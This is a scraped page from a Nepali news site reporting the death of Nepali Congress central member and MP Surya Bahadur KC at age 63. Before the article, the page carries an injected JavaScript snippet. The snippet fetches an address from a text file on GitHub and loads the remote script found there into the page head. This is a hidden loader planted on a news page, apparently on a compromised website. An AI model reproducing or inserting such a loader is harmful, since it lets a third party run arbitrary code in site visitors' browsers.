;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); कांग्रेसका केन्द्रीय सदस्य तथा संसद केसीको निधन – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • कांग्रेसका केन्द्रीय सदस्य तथा संसद केसीको निधन
राजनीति

कांग्रेसका केन्द्रीय सदस्य तथा संसद केसीको निधन

कात्तिक १८,

काठमाडौं । नेपाली कांग्रेसका आमन्त्रित केन्द्रीय सदस्य तथा प्रतिनिधिसभा सदस्य सूर्यबहादुर केसीको निधन भएको छ ।

उनको ६३ बर्षको उमेरमा निधन भएको हो । उनको निधन भएको पारिवारीको स्रोतले जनाएको छ । उनी पहिलो संविधानसभामा राप्रपाबाट संसद बनेका थिएपछि नेपाली कांग्रेसमा प्रवेश गरेका थिए ।

फेसबुक प्रतिक्रियाहरु